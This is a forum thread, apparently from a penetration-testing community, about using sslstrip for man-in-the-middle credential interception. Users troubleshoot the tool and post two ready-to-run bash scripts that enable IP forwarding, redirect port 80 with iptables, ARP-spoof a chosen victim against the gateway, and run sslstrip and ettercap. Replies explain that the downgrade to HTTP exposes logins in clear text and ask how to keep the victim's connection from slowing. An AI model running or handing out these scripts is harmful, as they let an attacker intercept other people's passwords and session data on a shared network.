Dear all
I have the problem with Favicon, when i try with mail.google.com , favicon doesn't replace !!!! I tested with sslstrip 0.2 buil-in BackTrack 4 and sslstrip 0.4 latest version .
sslstrip -f (favicon) ?
Somebody help me . Thanks guys so much
@fbi_mohd
try using ettercap for arp poisoning, instead.
Dear all
I have the problem with Favicon, when i try with mail.google.com , favicon doesn't replace !!!! I tested with sslstrip 0.2 buil-in BackTrack 4 and sslstrip 0.4 latest version .
sslstrip -f (favicon) ?
Somebody help me . Thanks guys so much
automated sslstrip
im writing a quick bash script to automate this, cuz im lazy and stuff. pretty much cut and paste scripting, but it checks if the ip is able to be reached and autofills everything but the target ip. im trying to add in an nmap scan to give a selectable list of reachable hosts, but im a noob to bash, but this works for me
#Author: sociopathichaze
#Purpose: Automating SSLStrip
GW=$(ip route show | grep default | awk '{ print $3}')
echo Enter Target IP:
read targ
ping -c 2 $targ > /dev/null
if [ $? != 0 ]
then
echo $targ
echo Cannot be reached
else
echo "1" > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
xterm -e "sslstrip -a -l 8080; bash" &
arpspoof -i eth0 -t "$targ" "$GW"
fi
#END
Hi sociopathichaze, this script not work with me (BT 4 pre release ) . Konsole show :Originally Posted by sociopathichaze
What's wrong ?root@ducnp-pentest:~# ./sslstrip.sh
: command not found 3:
: command not found 5:
Enter Target IP:
: command not found 7:
at a loss
copy paste into a text file -> save file -> type "chmod u+x filename" in konsole -> type "./filename"
im new to linux/bash, no idea why you're getting those errors. if anybody else could try and tell me if they have the same problem. so i know if its my script or something to do with ducnp's setup.
Can someone explain to me how does sslstrip do his magic ? Everything is clear to me, mitm arp poisoning, routing the traffic, etc.. I just dont understand how does it desencrypt the data.. Thanks.
More thorough script not including error-handling, because it is what I am known not to do. =PCode:#Author redhotfire #Reason for making: For myself, and others #Date: 26-08-09 #Thank you g0tmi1k for putting together the tutorial #Gateway address echo -n "Enter gateway address: " read gatewayAddress xterm -T ''Nmap'' -e "nmap -sP $gatewayAddress/24 ; bash" & #Ip address of 'victim' echo -n "Enter IP to be stripped: " read clientIP #Device to be used through-out echo -n "Enter device to be used: " read device echo 1 > /proc/sys/net/ipv4/ip_forward #Starts arpspoof xterm -T "Arpspoof" -geometry 90x15 -e "arpspoof -i $device -t $clientIP $gatewayAddress ; bash" & #Inserts rule into iptable xterm -T "Iptables" -geometry 90x15 -e "iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000" & #Starts sslstrip xterm -T "SslStrip" -geometry 90x15 -e "sslstrip -a -k -f ; bash" & #Starts etterrcap xterm -T "Ettercap" -geometry 90x15 -e "ettercap -T -q -i $device ; bash" & while [[ $decision != 'n' ]] do echo -n "Done [y/n]: " read decision if [[ $decision == 'y' ]]; then killall xterm exit 1 else echo fi done
Yet again, thank you g0tmi1k for writing this tutorial and creating videos on the subject.
If there are any errors, please report them in a PM to me, to not clutter this topic. This script is not
perfect so bear with me.
@Voodoo: Google it man.
To voodo : Googling man !
p/s : sslstrip just redirect HTTPS to HTTP .
while you sniffing the SSL traffic, the connection of the victim getting very slow. some one know how to fix this?
thanks
OK, i get it, it just redirects to http so the login came in clear text.. tks.
Posting Permissions